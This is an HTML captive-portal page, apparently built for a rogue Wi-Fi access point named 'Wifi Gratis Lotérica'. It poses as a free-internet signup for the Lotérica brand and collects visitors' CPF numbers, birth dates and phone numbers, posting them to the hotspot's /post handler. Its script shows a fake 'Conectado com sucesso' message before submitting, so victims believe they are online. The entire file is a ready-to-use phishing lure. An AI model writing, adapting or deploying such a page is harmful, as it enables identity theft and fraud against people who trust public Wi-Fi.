
<!-- AP="Wifi Gratis Lotérica" -->
<!DOCTYPE html>
<html>
<head>
  <title>Wifi Gratis Lotérica</title>
  <meta charset='UTF-8'>
  <meta name='viewport' content='width=device-width, initial-scale=1.0'>
  <style>
    a:hover{
      text-decoration: underline;
    }
    body{
      font-family: Arial, sans-serif;
      align-items: center;
      justify-content: center;
      background-color: #FFFFFF;
    }
    input[type='text'], input[type='password']{
      width: 100%;
      padding: 12px 10px;
      margin: 8px 0;
      box-sizing: border-box;
      border: 1px solid #cccccc;
      border-radius: 4px;
    }
    .container{
      margin: auto;
      padding: 20px;
      max-width: 700px;
    }
    .logo-container{
      text-align: center;
      margin-bottom: 30px;
      display: flex;
      justify-content: center;
      align-items: center;
    }
    .logo{
      width: 40px;
      height: 40px;
      fill: #FFC72C;
      margin-right: 100px;
    }
    .company-name{
      font-size: 42px;
      color: black;
      margin-left: 0px;
    }
    .form-container{
      background: #FFFFFF;
      border: 1px solid #CEC0DE;
      border-radius: 4px;
      padding: 20px;
      box-shadow: 0px 0px 10px 0px rgba(108, 66, 156, 0.2);
    }
    h1{
      text-align: center;
      font-size: 28px;
      font-weight: 500;
      margin-bottom: 20px;
    }
    .input-field{
      width: 100%;
      padding: 12px;
      border: 1px solid #BEABD3;
      border-radius: 4px;
      margin-bottom: 20px;
      font-size: 14px;
    }
    .input-field{
      width: 100%;
      padding: 12px;
      border: 1px solid #BEABD3;
      border-radius: 4px;
      margin-bottom: 20px;
      font-size: 14px;
    }
    .submit-btn{
      background: #0b57d0;
      color: white;
      border: none;
      padding: 12px 20px;
      border-radius: 4px;
      font-size: 0.875rem;
    }
    input[type='date'] {
      appearance: none;
      -webkit-appearance: none;
      -moz-appearance: none;
      background-color: white;
      padding: 12px;
      border: 1px solid #BEABD3;
      border-radius: 4px;
      margin-bottom: 20px;
      font-size: 14px;
      width: 100%;
      box-sizing: border-box;
    }
    .submit-btn:hover{
      background: #0e4eb3;
    }
    .forgot-btn{
      background: transparent;
      color: #0b57d0;
      border-radius: 8px;
      border: none;
      font-size: 14px;
      cursor: pointer;
    }
    .forgot-btn:hover{
      background-color: rgba(11,87,208,0.08);
    }
    .containerlogo{
      padding-top: 25px;
    }
    .containertitle{
      color: #202124;
      font-size: 24px;
      padding: 15px 0px 10px 0px;
    }
    .containersubtitle{
      color: #202124;
      font-size: 16px;
      padding: 0px 0px 30px 0px;
    }
    /* .containermsg{
      padding: 30px 0px 0px 0px;
      color: #5f6368;
    } */
    .containerbtn{
      display: flex;
      justify-content: end;
      padding: 30px 0px 25px 0px;
    }
    div#form-block{
      min-height: 150px;
    }
    div#success-block{
      display: none;
      text-align: center;
      min-height: 100px;
      margin-bottom: 30px;
      justify-content: center;
      align-items: center;
    }
    @media screen and (min-width: 768px){
      .logo{
        max-width: 80px;
        max-height: 80px;
      }
    }
  </style>
</head>
<body>
  <div class='container'>
    <div class='logo-container'>
      <?xml version='1.0' standalone='no'?>
      <!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 20010904//EN' 'http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd'>
    </div>
    <div class=form-container>
      <center>
        <div class='containerlogo'>
          <!-- Google Logo -->
          <div id="logo" title="Lotérica">
            <svg class="icon" height="80" viewBox="0 0 512 512" width="80" xmlns="http://www.w3.org/2000/svg">
                          <path style="fill:#BDEB73;" d="M438.63,222.333l-6.555-6.552l21.48-21.48c12.155-12.155,18.227-28.087,18.227-44.019
                s-6.072-31.864-18.227-44.019c-24.31-24.31-63.727-24.31-88.037,0l-60.627,39.626L256,215.782l4.116,6.552H438.63z"/>
              <path style="fill:#BDEB73;" d="M75.808,211.667l4.117,4.115l-21.48,21.48c-12.155,12.155-18.227,28.087-18.227,44.019
                c0,15.932,6.072,31.864,18.227,44.019c24.31,24.31,63.727,24.31,88.037,0l64.408-40.408L256,215.782l-2.803-4.115H75.808z"/>
              <g>
                <g>
                  <path style="fill:#7AA82D;" d="M435.662,512c-0.17,0-0.339-0.002-0.51-0.007c-10.765-0.276-19.266-9.227-18.99-19.991
                    c2.645-102.938-61.414-150.431-62.062-150.899c-8.729-6.306-10.693-18.494-4.387-27.222c6.307-8.728,18.494-10.691,27.222-4.387
                    c3.325,2.402,81.375,60.235,78.208,183.509C454.87,503.597,446.197,512,435.662,512z"/>
                </g>
                <g>
                  <path style="fill:#729B23;" d="M455.144,493.004c-0.278,10.59-8.952,18.996-19.481,18.996c-0.175,0-0.34,0-0.515-0.01
                    c-2.843-0.072-5.522-0.752-7.932-1.906c6.377-3.07,10.858-9.519,11.054-17.081c3.163-123.272-74.884-181.106-78.211-183.506
                    c-0.958-0.69-1.957-1.288-2.988-1.772c6.233-2.987,13.866-2.565,19.862,1.772C380.261,311.898,458.307,369.732,455.144,493.004z"
                    />
                </g>
                <g>
                  <g>
                    <path style="fill:#BDEB73;" d="M264.333,31.37L256,39.707l-21.48-21.48C222.365,6.072,206.433,0,190.501,0
                      c-15.932,0-31.864,6.072-44.019,18.227c-24.31,24.31-24.31,63.727,0,88.037l29.28,62.28L256,215.782l8.333-8.333V31.37z"/>
                    <path style="fill:#A4E540;" d="M365.518,106.264L256,215.782l-12.467-12.467l97.039-97.051c24.31-24.31,24.31-63.727,0-88.037
                      c-8.969-8.969-19.987-14.628-31.552-16.968C313.132,0.412,317.31,0,321.499,0c15.932,0,31.863,6.072,44.019,18.227
                      C389.827,42.537,389.827,81.954,365.518,106.264z"/>
                    <path style="fill:#A4E540;" d="M365.518,106.264L256,215.782V39.707l21.469-21.48c8.969-8.969,19.987-14.628,31.552-16.968
                      C313.132,0.412,317.31,0,321.499,0c15.932,0,31.863,6.072,44.019,18.227C389.827,42.537,389.827,81.954,365.518,106.264z"/>
                    <path style="fill:#8EC737;" d="M365.518,106.264L256,215.782v-24.934l84.572-84.584c24.31-24.31,24.31-63.727,0-88.037
                      c-8.969-8.969-19.987-14.628-31.552-16.968C313.132,0.412,317.31,0,321.499,0c15.932,0,31.863,6.072,44.019,18.227
                      C389.827,42.537,389.827,81.954,365.518,106.264z"/>
                  </g>
                  <g>
                    <path style="fill:#BDEB73;" d="M365.517,325.299l-44.7-65.7L256,215.782l-11,11v176.08l11-11.005l21.48,21.48
                      c12.155,12.155,28.087,18.227,44.019,18.227s31.864-6.072,44.019-18.227C389.827,389.026,389.827,349.609,365.517,325.299z"/>
                    <path style="fill:#A4E540;" d="M146.482,325.299L256,215.782l12.467,12.467l-97.039,97.051c-24.31,24.31-24.31,63.727,0,88.037
                      c8.969,8.969,19.987,14.628,31.551,16.968c-4.111,0.847-8.289,1.259-12.478,1.259c-15.932,0-31.863-6.072-44.019-18.227
                      C122.173,389.026,122.173,349.609,146.482,325.299z"/>
                    <path style="fill:#A4E540;" d="M146.482,325.299L256,215.782v176.075l-21.469,21.48c-8.969,8.969-19.987,14.628-31.552,16.968
                      c-4.111,0.847-8.289,1.259-12.478,1.259c-15.932,0-31.863-6.072-44.019-18.227C122.173,389.026,122.173,349.609,146.482,325.299
                      z"/>
                    <path style="fill:#8EC737;" d="M146.482,325.299L256,215.782v24.934l-84.572,84.584c-24.31,24.31-24.31,63.727,0,88.037
                      c8.969,8.969,19.987,14.628,31.551,16.968c-4.111,0.847-8.289,1.259-12.478,1.259c-15.932,0-31.863-6.072-44.019-18.227
                      C122.173,389.026,122.173,349.609,146.482,325.299z"/>
                  </g>
                  <g>
                    <path style="fill:#A4E540;" d="M365.517,325.299L256,215.782l12.467-12.467l97.051,97.039c24.31,24.31,63.727,24.31,88.037,0
                      c8.969-8.969,14.628-19.987,16.968-31.552c0.847,4.111,1.259,8.289,1.259,12.478c0,15.932-6.072,31.863-18.227,44.019
                      C429.245,349.609,389.827,349.609,365.517,325.299z"/>
                    <path style="fill:#A4E540;" d="M365.517,325.299L256,215.782h176.075l21.48,21.469c8.969,8.969,14.628,19.987,16.968,31.552
                      c0.847,4.111,1.259,8.289,1.259,12.478c0,15.932-6.072,31.863-18.227,44.019C429.245,349.609,389.827,349.609,365.517,325.299z"
                      />
                    <path style="fill:#8EC737;" d="M365.517,325.299L256,215.782h24.934l84.584,84.572c24.31,24.31,63.727,24.31,88.037,0
                      c8.969-8.969,14.628-19.987,16.968-31.552c0.847,4.111,1.259,8.289,1.259,12.478c0,15.932-6.072,31.863-18.227,44.019
                      C429.245,349.609,389.827,349.609,365.517,325.299z"/>
                  </g>
                  <g>
                    <path style="fill:#A4E540;" d="M146.483,106.264L256,215.782l-12.467,12.467l-97.051-97.039c-24.31-24.31-63.727-24.31-88.037,0
                      c-8.969,8.969-14.628,19.987-16.968,31.552c-0.847-4.111-1.259-8.289-1.259-12.478c0-15.932,6.072-31.863,18.227-44.019
                      C82.755,81.954,122.173,81.954,146.483,106.264z"/>
                    <path style="fill:#A4E540;" d="M146.483,106.264L256,215.782H79.925l-21.48-21.469c-8.969-8.969-14.628-19.987-16.968-31.552
                      c-0.847-4.111-1.259-8.289-1.259-12.478c0-15.932,6.072-31.863,18.227-44.019C82.755,81.954,122.173,81.954,146.483,106.264z"/>
                    <path style="fill:#8EC737;" d="M146.483,106.264L256,215.782h-24.934l-84.584-84.572c-24.31-24.31-63.727-24.31-88.037,0
                      c-8.969,8.969-14.628,19.987-16.968,31.552c-0.847-4.111-1.259-8.289-1.259-12.478c0-15.932,6.072-31.863,18.227-44.019
                      C82.755,81.954,122.173,81.954,146.483,106.264z"/>
                  </g>
                </g>
              </g>
              <circle style="fill:#7AA82D;" cx="256" cy="215.782" r="30.411"/>
              <path style="fill:#729B23;" d="M286.411,215.782c0,16.792-13.619,30.411-30.411,30.411c-3.255,0-6.387-0.515-9.323-1.463
                c12.228-3.935,21.088-15.411,21.088-28.948c0-13.536-8.859-25.013-21.088-28.948c2.936-0.948,6.068-1.463,9.323-1.463
                C272.792,185.371,286.411,198.99,286.411,215.782z"/>
            </svg>
          </div>
          <!-- /Google Logo -->
        </div>
      </center>
      <div id='form-block'>
        <center>
          <div class='containertitle'>Cadastre-se para Utilizar</div>
          <div class='containersubtitle'>Insira seus Dados</div>
        </center>
        <form action='/post' id='login-form'>
          <!-- CPF -->
          <input name="cpf" id="cpf" class="input-field" type="text"
            maxlength="14" 
            pattern="\d{3}\.\d{3}\.\d{3}-\d{2}"
            oninput="formatarCPF(this)"
            oninvalid="this.setCustomValidity('Por favor, insira o CPF no formato XXX.XXX.XXX-XX')"
            oninput="this.setCustomValidity('')"
            placeholder="CPF (Somente Números)" required>
          <input name='nascimento' class='input-field' type='date' oninvalid="this.setCustomValidity('Por favor, insira a data no formato dd/mm/aaaa')" placeholder='Data Nascimento' required>
          <input name="telefone" id="telefone" class="input-field" type="text"
            maxlength="15"
            pattern="\(\d{2}\)\s\d{5}-\d{4}"
            oninput="formatarTelefone(this)"
            oninvalid="this.setCustomValidity('Por favor, insira um telefone válido com 11 dígitos no formato (XX) XXXXX-XXXX')"
            oninput="this.setCustomValidity('')"
            placeholder="Telefone" required>          
    <div class='containerbtn'>
            <button id=submitbtn class=submit-btn type=submit>Acessar Internet</button>
          </div>
        </form>
      </div>
      <div id='success-block'>
        <center>
          <div>Conectado com sucesso. </br>Em instantes você será redirecionado.</div>
        </center>
      </div>
    </div>
  </div>

  <script>
    document.getElementById('login-form').addEventListener('submit', function(event) {
      event.preventDefault();

      document.getElementById('success-block').style.display = 'flex';
      document.getElementById('form-block').style.display = 'none';

      setTimeout(function() {
        document.getElementById('login-form').submit();
      }, 3000);
    });
    
    function formatarCPF(input) {
    // Remove tudo que não for dígito
    let valor = input.value.replace(/\D/g, '');

    // Limita a 11 dígitos
    if (valor.length > 11) valor = valor.slice(0, 11);

    // Aplica a máscara
    valor = valor.replace(/(\d{3})(\d)/, '$1.$2');
    valor = valor.replace(/(\d{3})(\d)/, '$1.$2');
    valor = valor.replace(/(\d{3})(\d{1,2})$/, '$1-$2');

    input.value = valor;
    }

    function formatarTelefone(input) {
    // Remove todos os caracteres não numéricos
    let valor = input.value.replace(/\D/g, '');

    // Limita a 11 dígitos
    if (valor.length > 11) valor = valor.slice(0, 11);

    // Aplica a máscara: (XX) XXXXX-XXXX
    if (valor.length >= 2) {
        valor = `(${valor.slice(0, 2)}) ${valor.slice(2)}`;
    }
    if (valor.length >= 10) {
        valor = valor.slice(0, 10) + '-' + valor.slice(10);
    }

    input.value = valor;
}
  </script>
</body>
</html>